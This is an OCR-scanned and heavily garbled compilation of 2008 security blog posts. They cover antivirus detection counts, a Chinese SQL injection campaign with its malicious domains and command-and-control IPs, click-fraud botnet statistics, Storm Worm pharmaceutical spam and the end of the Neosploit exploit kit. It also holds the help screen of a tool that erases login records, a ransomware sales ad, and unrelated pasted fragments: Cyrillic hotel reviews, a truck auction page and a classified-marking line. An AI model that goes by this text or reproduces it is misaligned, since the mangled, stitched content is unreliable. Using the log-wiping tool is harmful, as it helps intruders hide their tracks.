. http: //www.nruns.com/_downloads/PR-08-02_Reaction_to_McAfee_statement. pdf 
_hvep://ologs.2dnet com/securty/1p=1838 
10, peep: /oieg.tarentt ize. con/2000/01 /est er bebavioral- detection Wad 
11. http: //adanchev. blogspot con/2006/0 /scient fically-predicting-softvare. Kill 

. http: //ddanchev.blogspot .com/2006/09/zero-day-initiative-upcoming-zero-day.htm 
13, hetp://adanchev blogspot con/2006/05/delaying=yesterdaye~Oday-secarity tal 


15. http: //ddanchev.blogspot.com/2007/09/zero-day-vulnerabilities-market-model.htm 
. http: //ddanchev.blogspot.com/2007/07/zero-day-vulnerabilities-auction. htm 
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. http://ddanchev. blogspot .com/2007/01/zero-day-vulnerabilities-cash-bubble. htm 


4.7.31 Counting the Bullets on the (Malware) Front (2008-07-25 09:09) 


How much malware is your antivirus solution detecting? A million, ten million, even "worse", 
less than a million? Does it really matter? No, it doesn’t. [1]What’s marketable can also be 
irrelevant if you are to consider that today’s malware is no longer coded, [2]but generated 
efficiently and obfuscated on the fly. Sophos’s recent statistics : 


"It is estimated that the total number of unique malware samples in existence now ex- 
ceeds 11 million, with Sophos currently receiving approximately 20,000 new samples of 
suspicious software every single day - one every four seconds." 


[3]F-Secure’s comments according to which they’re "lacking behind" Sophos with ten 
million malware samples : 


"Our AVP database reached one million detection records last night. Dr. Evil would be 
so impressed..." 


[4]McAfee’s recent comments as well, which seem to detect less malware samples than 
F-Secure, depending on how you count them of course : 


"It demonstrates that it is possible to announce that we detected, at the end of 2007, 
“between 357,820 (DAT-5196) and 8,600,000 pieces of malware”. And | predict we will detect 
at the end of 2008 between 450,000 and 22,000,000 malware”. OK, | joke a bit, but I also 
want to demonstrate there are many manners to count malware and you must not judge a 
product only by the announced number of detections." 
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You have an antivirus software that’s detecting 10 million malware samples, in reality, 
while it’s protecting you from 10 million malware samples it wouldn’t protect you from [5]the 
just coded for hire malware bot that’s about to get used in a targeted attack. The number 
of malware samples detected by any antivirus vendor is up to how they actually count them, 
do they [6]take into consideration malware families, do they actually distinguish them, or are 
they in fact perceiving each and every malware as as seperate "bachelor". 


Given the speed in which malware authors are lauching a DDoS attack against AV ven- 
dors by crunching out dozens of malware variants parts of a single family, their actions could 
start directly driving the data storage market, and if they continue maintaining the same 
rhythm, soon you'll be partitioning a separate GB for the signatures files. Then again, the 
number of malware samples detected by an antivirus solution isn’t the single most important 
benchmark for its actual usability in a real-life situation, keep that in mind. 


[7]}Where’s the Count when you need him most? Well, he’s somewhere out there count- 
ing. 


1 
2 

3 

4. http: //www.avertlabs.com/research/blog/index . php/2008/06/19/i-say-we-are-detecting-between-400-000-and- 10 
5 
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4.7.32 Counting the Bullets on the (Malware) Front (2008-07-25 09:09) 


1722 


[376] 


17193 


CTONT Mit [OBOPUT, YTO GNArOQapA NPEKPACHON PAGHOTE MACTEPS, KOTOPbIM, KAKETCA, HE YCTAT COREPWEHCTECESTO CA, MEHA Np SACENeHit TYT Ke OGCHY KINA NO 
Nonwow. Mpenocrasunit maxcumManbHo NOsDHMA BbIe3Q B 15:00 emecTo 12.00, nanu nepexogHuKos, OOecnewinn NpexpacHEM room SeMice, KPScoTy # Ka¥ecTBO HOMEDa 
Boi MoxeTe OUEHHTS Ha DOTO Ceepxy Hit BONPOCHKA, KNWeTOWeHbEH He BOIHMKNO B NPOUecce. Sacenanca A OKONO 21:00 NO YuKarcKomy, B MecTax OGuTaHHA CepxnKos 
A NOQOSP!ERAW ITO Geao OPHEHTIPOBOUHO 5 TPS. HECMOTPA Hit HA YTO, MEHA CONPOBOLMNe ENNOTS MO yCNeWHOrO NNwxa & KPOeAaTd. Beicumit munorax! 


He cMor yRepxaTbcA 4 HE NOEXaTb 3a-TECTAPaUBHTb HOBbIN annapat.s CembIo, pa3sHnuy Mexay 
CTAaPbiIM MOXKETE NOCMOTPeTb BOOUKW) 


[377] 


[378] 


17194 


[379] 


17195 


[380] 


17196 


AALPHA LOCKER 15 Wwreirren in C #. It HAS A MINIMUM Wwrent To SOxs. It an- 
CRYPTS ALL DRIVES CONNECTED IN THe PC. EnNceRYPTED Fuss Tee PC Has onan 
SWITCHED OFF, WHEN SWITCHED ON AGAIN. THE UNIQUE KEY FOR EACH MACHEN 
LARGE ENCRYPTED LIST OF EXTENSIONS THAT CAN @E REFILLED IF DEsineD. Da 
CRYPTOR FILES ALLOWS SELECTIVE DEKRIPT A SINGLE FILE OR AN ENTIRE FOLDER, 
WHICH SIGNIFICANTLY INCREAS TME CHANCE TO RESTORE THE ENCRYPTED DAT: 
AOMIN WITH STATISTICS AND GENERAL INFORMATION. THE ABILITY TO ADD OF 
REMOVE FEATURES ON THE REQUEST OF THE BUYER. SchipT DATASASE AUTOMATIC 
BACKUP, WHICH HAS FLEXIBLE SETTINGS, WHICH ALLOW TO MAKE TIMELY BACKUP 
COMMUNICATION FOR THE DECKYFTOR VIA E-MAK. 


ALPHALOCKER@EXPLOIT 1M 


[381] 


17197 


[382] 


17198 


How much malware is your antivirus solution detecting? A million, ten million, even "worse", 
less than a million? Does it really matter? No, it doesn’t. [1]What’s marketable can also be 
irrelevant if you are to consider that today’s malware is no longer coded, [2]but generated 
efficiently and obfuscated on the fly. Sophos’s recent statistics : 


"It is estimated that the total number of unique malware samples in existence now ex- 
ceeds 11 million, with Sophos currently receiving approximately 20,000 new samples of 
suspicious software every single day - one every four seconds." 


[3]F-Secure’s comments according to which they’re "lacking behind" Sophos with ten 
million malware samples : 


"Our AVP database reached one million detection records last night. Dr. Evil would be 
so impressed..." 


[4]McAfee’s recent comments as well, which seem to detect less malware samples than 
F-Secure, depending on how you count them of course : 


"It demonstrates that it is possible to announce that we detected, at the end of 2007, 
“between 357,820 (DAT-5196) and 8,600,000 pieces of malware”. And | predict we will detect 
at the end of 2008 between 450,000 and 22,000,000 malware”. OK, | joke a bit, but I also 
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want to demonstrate there are many manners to count malware and you must not judge a 
product only by the announced number of detections." 


You have an antivirus software that’s detecting 10 million malware samples, in reality, 
while it’s protecting you from 10 million malware samples it wouldn’t protect you from [5]the 
just coded for hire malware bot that’s about to get used in a targeted attack. The number 
of malware samples detected by any antivirus vendor is up to how they actually count them, 
do they [6]take into consideration malware families, do they actually distinguish them, or are 
they in fact perceiving each and every malware as as seperate "bachelor". 


Given the speed in which malware authors are lauching a DDoS attack against AV ven- 
dors by crunching out dozens of malware variants parts of a single family, their actions could 
start directly driving the data storage market, and if they continue maintaining the same 
rhythm, soon you'll be partitioning a separate GB for the signatures files. Then again, the 
number of malware samples detected by an antivirus solution isn’t the single most important 
benchmark for its actual usability in a real-life situation, keep that in mind. 


[7]}Where’s the Count when you need him most? Well, he’s somewhere out there count- 
ing. 


1 fittp/eophos coa/pressottice/nous/articles/2008/07/security-report. hal 

2, ftp /atenchey. blogspot coa/2006/06/ vesting” signature bared antivirus Aad 

3, http: / owe. f-secure con/eblog/archives/00001473. nm 

4. http: //www.avertlabs.com/research/blog/index . php/2008/06/19/i-say-we-are-detecting-between-400-000-and- 10 
5 sep //asancuay,STOpipse esa] 2006/01] Solna” tpyeae-ani ainaneoag Re nea 

6. http: / /adancnev. blogspot con/2006/08/nalvare-bot~fanilies~technology-and. ht 
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4.7.33 Smells Like a Copycat SQL Injection In the Wild (2008-07-28 12:07) 


In between the [1]massive SQL injections, that as a matter of fact remain ongoing, copycats 
taking advantage of the very same SQL injection tools using public search engine’s indexes 
as a reconnaissance tools, are also starting to take advantage of [2]localized and targeted 
attacks, attacking specific online communities. Among these is mx.content-type.cn /day.js 
using day.js to attempt multiple exploitation using publicly obtainlable exploits such as 
Adodb.Stream, MPS.StormPlayer, DPClient.Vod, IERPCtI.IERPCtI.1, GLIEDown.IEDown.1, and 
targeting primarily Chinese web communities. 


Compared to a bit more sophisticated [3]attack tactics applied by Chinese hackers, tak- 
ing advantage of [4]localized versions of the [5]de facto web malware exploitation kits, those 
who don’t have access to such continue using cybercrime 1.0 [6]DIY exploit embedding tools 
at large. The rest of the SQL injected domains as well as the exploits themselves are parked 
on the same plaee - 222.216.28.25, also responding to : 


down.goodnetads .org 
ads.goodnetads .org 
real.kav2008 .com 
hk.www404 .cn 
errnwww404 .cn 
mx.content-type .cn 


sun.63afe561 .info 
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ads.633f94d3 .info 
ads.1234214 .info 
ad.50db34d5 .info 
ads.50db34d5 .info 
ad.8d77b42a .info 
web.adsidc .info 
free.idcads .info 
free.cjads .info 
ads.adslooks .info 
list.adslooks .info 


ad.5iyy .info 


The SQL injected domains : 
ads.633f94d3.info/day .js 
ad.8d77b42a.info/day .js 
ad. 5iyy.info/day .js 
free.idcads.info/day .js 
efreesky.com/day .js 


v.freefl.info/day .js 


The internal structure : 
free.idcads.info/f/index .htm 
free.idcads.info/014 .htm 
free.idcads.info/reall1 .htm 


free.idcads.info/real10 .htm 
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free.idcads.info/Iz .htm 
free.idcads.info/bf .htm 
free.idcads.info/kong .htm 
free.idcads.info/f/swfobject .js 


ad.50db34d5.info//rm %5C/rm .exe 


Parked domains responding to the command and control locations, 60.191.223.76 and 
222.216.28.100 : 


ftp.gggjjj .info 
live.ads002 .net 
log.goodnetads .org 
dat.goodnetads .org 
root.51113 .com 
sun.update999 .cn 
abb.633f94d3 .info 
up.50db34d5 .info 
web.cn3721 .org 
dat.goodnetads .org 
cs.rm510 .com 
sb.sb941 .com 
k.sb941 .com 
info.sb941 .com 
day.sb941 .com 
post.ad9178 .com 


v.91tg .net 
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Centralizing their scammy ecosystem always makes it easier to monitor, 
and of course, expose. 


Related posts: 

[7]SQL Injecting Malicious Doorways to Serve Malware 

[8]Yet Another Massive SQL Injection Spotted in the Wild 

[9]Malware Domains Used in the SQL Injection Attacks 

[10]SQL Injection Through Search Engines Reconnaissance 

[11]Google Hacking for Vulnerabilities 

[12]Fast-Fluxing SQL injection attacks executed from the Asprox botnet 
[13]Sony PlayStation’s site SQL injected, redirecting to rogue security software 


[14]Redmond Magazine Successfully SQL Injected by Chinese Hacktivists 


http: //ddanchev. blogspot .com/2008/07/ayyildiz-turkish-hacking-group-vs.htm 


. http: //ddanchev. blogspot .com/2008/07/obfuscating-fast-fluxed-sql-injected.htm 


ttp://ddanchev. blogspot .com/2008/04/diy-exploit-embedding-tool-proprietary.htm 
http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 


ttp://ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 


. http: //ddanchev. blogspot .com/2007/09/diy-exploits-embedding-tools.htm 


http: //ddanchev. blogspot .com/2008/07/sql-injecting-malicious-doorways-to.htm 
ttp://ddanchev. blogspot .com/2008/05/yet-another-massive-sql-injection.htm 
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ttp://ddanchev. blogspot .com/2008/05/malware-domains-used- in-sql-injection.htm 


10. http: //ddanchev.blogspot .com/2007/07/sql-injection-through-search-engines .htm 
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4.7.34 Click Fraud, Botnets and Parked Domains - All Inclusive (2008-07-28 13:52) 


Statistics 

Date Bots online | New bots | Searches | Clicks | Profit |Sales | Referrals | Total 
2008-04-16 61708 2270 | 260220 | 39766] 289.21) 147.00 0.0 436,21 
2008-04-17 61293 2272 292453 8657 | 286.64] 189.00 0,00 79.64 
2008-04-18 99275 2108 239186 5499 99,29} 294,00 0,00] 553,29 
2008-04-19 52448 1987 | 4694 | 34788] 233.39) 126.00 0.00] 359,39 
2008-04-20 55132 1782 231377 | 35978) 236.71] 273.00 0.00} 509,71 
2008-04-21 61412 1851 258801 | 39640] 283.11] 168.00 0,00 51,11 
2008-04-22 61742 491 | 259015 | 40101 | 297.17 | 168.00 0.00] 465.17 
2008-04-23 61117 1516 2093528 | 38002] 297.31) 252.00 0.00} 549,31 
2008-04-24 60356 1356 242616 | 36491 67,90} 231.00 0.00] 498,90 
2008-04-25 57005 388 | 220203 | 32980! 247.76] 231.00 0.00 73.76 
2008-04-26 49674 1339 209021) 31741) 228,51 168,00 0,00] 396,51 
2008-04-27 12120 15268 | 209315 266 240.1 105,00 0.00] 345.1 
2008-04-28 38217 1924 240335 | 38509) 285.49] 315.00 0.00] 600.49 
2008-04-29 58123 1878 225218 | 37330] 281.19] 189.00 0.00} 470,19 
2008-04-30 55451 2270 | 217815 | 37013) 255.21] 231.00 0.00} 486.21 
Total: 36507 26962 3553797 | 549162 | 3989.02 | 3087.00 0.00 | 7076.02 


It gets very ugly when someone owns both, the botnet, and the portfolio of parked domains 
actively participating in PPC (pay per click) advertising programs, where the junk content, or 
the typosquatted domain names is aiming to attract high value and expensive keywords in 
order for the scammer to year higher on per click percentage. This is among the very latest 
tactics applied by those engaging in click fraud. Hypothetically, the cost to rent the botnet 
and commit click fraud would be cheaper than sharing revenue on per click basis with "human 
clickers" who earn money based on how many ads they click given a set of scammer’s owned 
sites, where the customer supports represents a DIY proxy switching application changing 
their IP on the fly. 


[1]Click Forensics’s recent Q2 2008 report indicates that botnets were responsible for 
over 25 % of all click fraud activity they were monitoring during Q2. Not surprising, given that 
[2]botnets have long been observed to commit blick fraud, using a common traffic exchange 
scheme. What’s new is the [3]use and abuse of parked domains : 
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" Despite indication that some of the clicks from parked domains were invalid, Google 
failed to disclose to the plaintiff specific domain names in which these ads were clicked on, 
making detection of invalid clicks difficult and even worse concealing any evidence of invalid 
clicks," the lawsuit alleges. RK West eventually went through its server logs and discovered 
the source of the clicks, said Alfredo Torrijos, one of the company’s attorneys. " 


Statistic overview / Country brakedown 


Select date [2008-04-25 track | >| Show data | 


country Bots Online Bots New 

US 22208 607 
FR 3433 186 
IF 5431 179 
TR 537 194 
GB 4855 129 
Fl 4107 32 
CA 550 65 
BR 3219 105 
NL 2562 62 
2392 66 
DE 2207 46 
AU 1397 45 
IN 130 19 
IT 1300 52 
PH 1207 oF 
BE 101 2 
HU 972 22 
GR 536 24 

= 453 46 
RO 234 5 
NZ 39 1 


Cybersquatting security vendors in order to improve the chances of attracting high-valued 
keywords to later on commit click fraud on the parked domains, now showing relevant security 
ads, is nothing new. [4]The trend has been pretty evident for a while, with [5]cybersquatting 
increasing on an yearly basis [6Jaccording to multiple sources : 
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"Rise in pay-per-click advertising where cybersquatters link the domain name they have 
registered with a website containing ads promoting a variety of competing brands. The 
cybersquatter receives money every time internet users access this website and click on one 
of the ads." 


However, the "internet users who are supposed to click on one of the ads on the parked 
domains owned by the scammers" will get clicked by a botnet owned or cost-effectively rented 
by the scammer. Here’s a sample of currently parked domains attracting Symantec ads : 


an Symanyec.com = 
@ Technical Support Symantec @ 
Search ; @ Tech Support AntiVirus @ 
Sern] = = @ Norton Anti Virus Norton Removal Too! @ 
i @ Spyware Removal Customer Service @ 
: @ Call Center Antivirus @ 
? @ Security Software Help Desk @ 


? @ Antivirus Software 


| @ Norton Antivirus 
Register 


@ Antivirus Gratis 


Retsied Searches Customer Service | Antvrus | Help Desk | Network Secunty | Screen Savers | == 


symentec .com 
symantek .com 
symanteck .com 


symantac .com 
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17.9.26 Shots from the Wild West - Random Cybercrime Ecosystem Screenshots 
2021 - An OSINT Analysis - Part Six (2021-09-30 03:35) 


An image is worth a thousand words. 
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--utmp=utmp file 
specify the path to utmp file, which is /var/run/utmp by defautt 
utmp file is read by ‘who','w' and other commands 
-wtmp=wtmp file 
specify the path to wtmp file, which is /var/log/wtmp by default 
wtmp is read by ‘last’ and other commands 
-b, --btmp=btmp file 
specify the path to btmp file, which is /var/log/btmp by default 
btmp is read by ‘lastb* and other commands 
-lastlog=lastlog file 
specify the path to lastlog file, which is /var/log/lastlog by default 
lastlog is read by ‘lastlog’ and other commands 
ILTERS: 
-n, --name=username 
specify log record by username 
address#host 
specify log record by host ip address 
-time=time 
specify log record by time (YYYY:MM:DD:HH:MM:SS) 
ACTIONS: 
-p, --print 
print records for specified ENTRIES 
--clear 
clear records for specified ENTRIES with FILTERS 
usually you need permission to edit log 
help 
show this message and exit 


:~/hidemyass# ./hidemyass 


--utmp=utmp file 
specify the path to utmp file, which is /var/run/utmp by defautt 
utmp file is read by ‘who',‘w' and other commands 
-wtmp=wtmp file 
specify the path to wtmp file, which is /var/log/wtmp by default 
wtmp is read by ‘last’ and other commands 
--btmp=btmp file 
specify the path to btmp file, which is /var/log/btmp by default 
btmp is read by ‘lastb’ and other commands 
-lastlog=lLastlog file 
specify the path to lastlog file, which is /var/log/lastlog by default 
lastlog is read by ‘lastlog’ and other commands 
ILTERS: 
-n, --name=username 
specify log record by username 
address#host 
specify log record by host ip address 
--time=time 


print records for specified ENTRIES 
--clear 
clear records for specified ENTRIES with FILTERS 
usually you need permission to edit log 
help 
show this message and exit 
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Haxone, To AOwnn py HaNvCaTh OT3biB! Hauny c HCTOpHM, c Cepzamom Haus B3IaiMOOTHOWErEtA PaIBNBaNHich HH OAH ron, NoOeBaNH B 
Domueamare 1 OurmaHgun c ero nomoug1O. MosTomy, Koma BCTan BONpPOC oO GiogyKeTHOM OTAbmMe Hawel Cembiu M3 4 YenoBeK, CoMHeHHI He Oban0 
Yurrrei@an orparanertibal BbiSop HaNpaBNerad, OCeNHHE KaHHKyNb! pew NMpoBectu B Typuyut K Comanerno Wena NaKeTHOFO OTADIXa y 
TyponepaTopos 3awxKanBana, HO AeTH (4 BIpocNbie Toe) Gesymno xoTen#t K Mopto. Mo Tory yAanocb nolimaTD GrogxetHbie Guneto! Ha 4-x 3a 68 Tp 
va 12 Ane MC 3TOrO MomenTa GyxBanbHo 3aKnNena ABYC TOPOMHAR paboTa: ECTECTBEHMO, XOTENOCe NOmITS B NPEMIyM OTENAX H HMETD 
nojorpesaempie Gacceitm: B HOAOpECcKW! Ce30H. CnoxHocTh 1 He GIOJDKETHOCTD PaSMeNjEHHA B OTeENAX SaKmeouanach B Gonbuwom BOIpacTe AeTEeN, 
KOTOpee CTapwe 11 4 MHOFO Ie ye PACCMMTbIBaNHC. KAaK B3pocnBie. Kpome Toro, METH XOTeENM MMeT CBO OTAENbHyIO KOMMaTY, “TO NOANagQano 
WCKMOYHTENbHO MOA Familie Room. Mo pyccKon npieeraKe - xoTenoch GprnnarTos 3a Aapom) 3aberan BNepeg Momo KOHCTATHpOBaTb, 4TO Ecnit 
xovew Qoporo 1 GoraTo BCe paBHO He NOMYNHTCA 3a TPH KONesiKH, HO B pesynbTaTe c Cepxaiom Bce BbauNo muHnmye Ha 100 Tp Qewesne, vem 
NosMuNH y TyponepaTopos. Me: He mo6um CHQeTS Ha OANOM MECTE MH NOSTOMY B MNnaHe KPOMe NpoxBannA y Hac Gein sannannposana BCTPeYa C 
Apysbamn 8 Genexe, nyrewecTene Ha Nomyxxane, CamocToATenbHoe NocewenHe xpama CB. HuKonaa, a TaKKe wonnuaHr B pesynptare npit 
NocToRMHon NoARepaxe CepxoiKa (ONeM> BaId0, YTO MPH NoaAHNX JaceNneHHAx On BCerga GbiNn Ha CBAIM) Mb! NOGbiBanH B TPex OTeNAXx: Jlen»dun 
waeneprian, Napa Bapyt 6 Anranve 1 Ansa Jlona 8 Benexe. Huxaxnx npoGnem m HaKnagoK B xome pasmeujeHita HE BOSHMKNO, CpaboTaHo GbicTpo, 
Y¥eTKO H NpoceccvoHanbHo. Bce Haws «xoTenxi» Opin peann3oeanei! Or sceft Hawel cempen Cepaamy xenaem 3Q0po0eHn B STO CNOKHOe BpemA H 
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Doc Type: MS-CERTFICATE OF TITL 
Odorneter: 764,639 1 (ACTUAL) @ 
Highlights: Rus and Deve@ 

Primary Damage: MNOR DENTISCRATC 


Secondary Damage: 

Est Reta Value: 

Repaw Est 

VI: ey ence a” 
Body Style: TRACTOR TRUCK 
Color: WHITE 

Engine Type: 12.01 6 
Orive: REAR-WHEEL ORIVE 
Cylinder: 6 

Fuek OESEL 

Keys: Yes 


Facility: TH - MEMPHIS 
Sale Oste: Wedeesday, Aort 22. 2015 
Sale Time: 12:00 Au EDT 

1GndRow, WSGI06 

‘Status: Soid 
Status: Paymert Due 

Your Current Bit $10,000 USO 
Congratulations, You've Woe! 
Current amount due & $ 0 USO 


Charges may apply at time of pickup 


This vehicte is being sok as “as 6 - where a” 
Al bids are binding acd af sales are final 
What Ths Means 


Sale Information 


Statistics 


New bots | Searches | Clicks | Profit | Sales 


2008-04-16 90017 363 215899 | 39014] 259.9 Oo 0.00) 427.91 


2008-04-17 : ie 76! 207155 | 36840] 257.07 : 0.00) 362.07 


2008-04-18 8659 2763 201771 343/. 23/95 54, 0,00 321,98 


2008-04-19 84306 253 218774 | 38219] 237.- 63, 0.00} 300.40 


2008-04-20 258 22963 41082 | 265.43 47, 0.00 
t 
2008-04-21 88838 2266 22 8} 38898] 250.87 : 0.00 


+ + 


2008-04-22 8747 213 3919 25 47, 0,00 


2008-04-23 84913 219! 3373! 24 84, 0.00 
4 


2008-04-24 83987 2339 20227¢ 3353! 230.17 47, 0.00 | 


= 
2008-04-25 81167 2262 87496 | 3037¢ 210.86 26.00 0.00 


2008-04-26 7852 2562 200704 | 3114! 213.63 4? 00 0,00 


2008-04-27 81075 2548 218523 | 364 248.16 47,00 0,00 


2008-04-28 84365 2664 216132 | 36240] 245,50 26.00 0,00 


2008-04-29 81492 79 180449 | 34221 63.0 0,00 


-+ 


2008-04-30 2202 72357 | 34247] 214.60 00 0.00) 445,60 
+ 


Total: 264204 3396° 3095192 | 537764 | 3605.41 | 1890.0 0.00 | 5495,41 


What’s most disturbing is that instead of having cybersquatting taken care take of a long 
time ago, so that scammers would need to emphasize on the junk content in order to attract 
the relevant ads on the bogus domains, cybersquatting still does the magic by including the 
targeted word in the domain name itself, so that no junk content generation courtesy of a 
blackhat SEO tool is needed. 


Related posts: 
[7]Cybersquatting Security Vendors for Fraudulent Purposes 
[8]Cybersquatting Symantec’s Norton AntiVirus 


[9]The State of Typosquatting - 2007 


http: //blogs.zdnet .com/security/?p=1200 


http: //www.mediapost .com/publications/?fa=Articles.showArticleHomePagekart_aid=86914 


http: //www.domaintrading360 . com/2008/July/Cybersquatt ing-has- Increased-48-since-25.htm 
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4.7.35 Over 80 percent of Storm Worm Spam Sent by Pharmaceutical Spam Kings 
(2008-07-29 09:29) 


Your Cit) 0.00 (0 tows 
Preceed be Checkout 
Special Offer 


Free Viagra samples 


European & Pharm: 


#1 Internet Orlise Oregutoce 4 pilts bee every order 


12 pits for order 95300 


Male Enharcemert 


Men's Heath 


SALES - 20% OFF 
Female Enharcemert 
‘Weight Lose 
Pets 
Gurns New! 
Patches New! 
Bote Butaong 
Hipnctheney 
Sleeping Ad 
Shp Smoking 
Dertal Vhetering 
Chaies Som Tabs ven. Leva 
Pain Rebe?Muscle Retaxant _— eed Professional 
Calis: Our price Our price 
Heatty Bones — eas 2224 Ov orice 
- eur 
Genera Heath 
Skin Care sore £8 @ uve More be @ iwc nore t @ wim 
Ant Acidity 
Levera Fomate Viagra Tramnsdad 
Ant MlerpoAsitns - 
pe Ou price Ow price Bi Ow price 
Ant Depressantant- Anuety eo a 4.42 F aa 
oo The 


Ant Diabet, = 


It used to be a case where a botnet would be used for a single purpose, spamming, phishing, 
or malware spreading. At a later stage, the steady supply of malware infected allowed botnet 
masters more opportunities to "sacrifice" the clean IP reputation and engage in several 
malicious activities simultaneously - [1]today’s underground multitasking improving the 
monetization of what used to be commodity goods and services. 


Today, a botnet will not only be [2]sending out phishing emails, automatically [3]SQL in- 
ject vulnerable sites across the web, but also, provide [4]fast-flux infrastructure to money 
mule recruitment services, all of this for the sake of optimizing the efficiency provided by the 
botnet in general. This [5Joptimization makes it possible for a single botnet to be partitioned 
and access it it [6]sold and resold so many times, that it would be hard to keep track of all the 
malicious activities it participates in. Cybercrime in between on multiple fronts using a single 
botnet is only starting to take place as concept. 
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That’s the case with Stormy Wormy, according to IronPort whose "[7]Researchers Link 
Storm Botnet to Illegal Pharmaceutical Sales" : 


"Our previous research revealed an extremely sophisticated supply chain behind the ille- 
gal pharmacy products shipped after orders were placed on botnet-spammed Canadian 
pharmacy websites. But the relationship between the technology-focused botnet 
masters and the global supply chain organizations was murky until now," said Patrick 
Peterson, vice president of technology at IronPort and a Cisco fellow. “Our research has 
revealed a smoking gun that shows that Storm and other botnet soam generates commission- 
able orders, which are then fulfilled by the supply chains, generating revenue in excess of 
(US) $150 million per year." 


Murky until now? | can barely see anything around me due to all the smoke coming 
from the smoking guns of who’s what, what’s when, and who’s done what with who, especially 
in respect to Storm Worm whose multitasking on different fronts in the first stages of their 
appearance online made it possible to establish links between several different malware 
groups and the "upstream hosting providers", until the botnet scaled enough making it harder 
to keep track of all of their activities. 


[8]The Storm Worm-ers themselves aren’t sending out pharma spam, the customers to 
whom they’ve sold access to parts of Storm Worm are the ones sending the pharma spam. 
Here’s a brief analysis published in May - "[9]Storm Worm Hosting Pharmaceutical Scams". 
What’s in it for the scammers? Income based on a revenue-sharing affiliate program, [10]a 
pharmacy affiliate program has been around for several years : 


"This criminal organization recruits botnet spamming partners to advertise their illegal 
pharmacy websites, which receive a 40 percent commission on sales orders. The organization 
offers fulfillment of the pharmaceutical product orders, credit card processing and customer 
support services" 


What’s coming out of Storm Worm’s botnet isn’t necessarily coming from the hardcore 
Storm Worm-ers whose job today is more of a campaign-rotation related in order to ensure 
new bots are added, what’s coming out of Storm Worm is coming from those [11]using the 
access they’ve purchased to a part of the botnet. 
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Related posts: 

[12]Storm Worm Hosting Pharmaceutical Scams 
[13]AIl You Need is Storm Worm’s Love 
[14]Social Engineering and Malware 

[15]Storm Worm Switching Propagation Vectors 
[16]Storm Worm’s use of Dropped Domains 
[17]Offensive Storm Worm Obfuscation 
[18]Storm Worm’s Fast Flux Networks 
[19]Storm Worm’s St. Valentine Campaign 
[20]Storm Worm’s DDoS Attitude 

[21]Riders on the Storm Worm 


[22]The Storm Worm Malware Back in the Game 


1. http: //ddanchev. blogspot . com/2008/06/underground-multitasking-in-action.html 
2. http: //ddanchev. blogspot .com/2008/02/inside-botnets-phishing-activities .htm 
3. http: //blogs. zdnet . com/security/?p=1122 

4. http: //ddanchev . blogspot . com/2008/07 /money-mule-recruiters-use-asproxs-fast.. html 
5. http: //ddanchev. blogspot . com/2007/10/botnet-on-demand-service html 
6 
7 
8 
9 


. http: //ddanchev. blogspot .com/2008/03/loadsccs-ddos-for-hire-service.htm 


. http: //www.darkreading.com/document.asp?doc_id=156139&WT.svl=news1_1 


RTT, 
. http: //ddanchev. blogspot .com/2008/05/storm-worm-hosting-pharmaceutical-scams.html 
10. http: //ddanchev.blogspot .com/2007/10/incentives-model-for-pharmaceutical.htm 
11. http://it.slashdot.org/article.pl?sid=07/10/16/155209 
12. 
13. http://ddanchev.blogspot .com/2008/05/al1l-you-need-is-storm-worms- love. htm 
14. http: //ddanchev.blogspot.com/2007/01/social-engineering-and-malware.htm 
15. 
16. 
17. http://ddanchev.blogspot.com/2007/08/offensive-storm-worm-obfuscation. htm 
18. 
19. 
20. 
21. http: //ddanchev.blogspot .com/2007/12/riders-on-storm-worm. htm 
22. http://ddanchev. blogspot .com/2007/08/storm-worm-malware-back- in-game .htm 


4.7.36 Neosploit Team Leaving the IT Underground (2008-07-29 20:19) 
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The [1]Neosploit Team are abandoning support for their Neosploit web exploitation malware 
kit, citing a negative return on investment as the main reason behind their decision. However, 
given [2]Neosploit’s open source nature just like the majority of web malware kits, and the fact 
that it’s slowly, but surely turning into a commodity malware kit just like MPack and Icepack 
did, greatly contribute to its extended "product lifecycle" : 


"Let’s discuss their business model, how other cybercriminals disintermediated it thereby 
ruining it, and most importantly, how is it possible that such a popular web malware exploita- 
tion kit cannot seem to achieve a positive return on investment (ROI). The short answer is - 
piracy in the IT underground, and their over-optimistic assumption that high-profit margins 
can compensate the lack of long-term growth strategy, which in respect to web malware 
exploitation kits has do with the benefits coming from converging with traffic management 
tools. Let’s discuss some key points." 


[3]The end of Neosploit malware kit, doesn’t mean the end of Neosploit Team, or the 
sudden migration to other malware kits since they’re no longer providing support in the form 
of new obfuscations and set of exploits to their customers. Their customers have been in 
fact self-servicing their needs enjoying the modular nature of the kit, the result of which is an 
unknown number of modified Neosploit kits. 


Related posts: 

[4]The Underground Economy's Supply of Goods and Services 
[5]The Dynamics of the Malware Industry - Proprietary Malware Tools 
[6]Localizing Cybercrime - Cultural Diversity on Demand 

[7]E-crime and Socioeconomic Factors 


[8]Localizing Open Source Malware 
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[9]Coding Spyware and Malware for Hire 


[10]The FirePack Exploitation Kit Localized to Chinese 


[11]MPack and IcePack Localized to Chinese 


[12]The Icepack Exploitation Kit Localized to French 


1. ftp: / loge net. con/security/7p=1598 

2, http: / /adanchev blogspot .con/2008/07 /necsploit-nalvare-Kit-updated- vith htall 
3, heep://avy.re0.con/blog/blog. entry agpr?id-1314 

4, http: //édanchey .blogepot.con/ 2007 /03/ underground econonys~supply-of- goods tal 
5, http:/ /ddanchey. blogspot .con/2007/10/dynanics-of-nalvare~industy. him 
6 
7 
8 
9 


| het: //Adanchev blogspot .con/2008/02/local izing-cybercrine-cultural heal 
_http://adanchey blogspot .con/2008/01/e~crine-and-socioecononic~factors nal 

_ hep: / /adanchev blogspot. con/2007/00/ local izing-open-source-nalivare. neal 
_http://adanchev blogspot .con/2008/0T /coding-spyvare~and-nalvare~for-hire. heal 


With cybercrime getting easier to outsource these days, and with the overall underground 
economy’s natural maturity from products to services, "[1]managed spamming appliances" 
and managed spamming services are becoming rather common. Increasingly, these "vendors" 
are starting to "vertically integrate", namely, start diversifying the portfolio of services they 
offer in order to steal market share from other "vendors" offering related services like, email 
database cleaning, segmentation of email databases, email servers or botnets whose hosts 
have a pre-checked and relatively clean IP reputation, namely they’re not blacklisted yet. 


How much does it cost to send 1 million spam emails these days? According to a ran- 
dom spamming service, $100 excluding the discounts based on the speed of sending desired, 
namely 10-20 per second or 20-30 per second. Let’s dissect the service, and emphasize on its 
key differentiation factors, as well as the customerization offered in the form of a dedicated 
server if the customer would like to send billions of emails : 
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TOP SECRET//COMINT//REL FVEY 


SOMBERKNAVE 
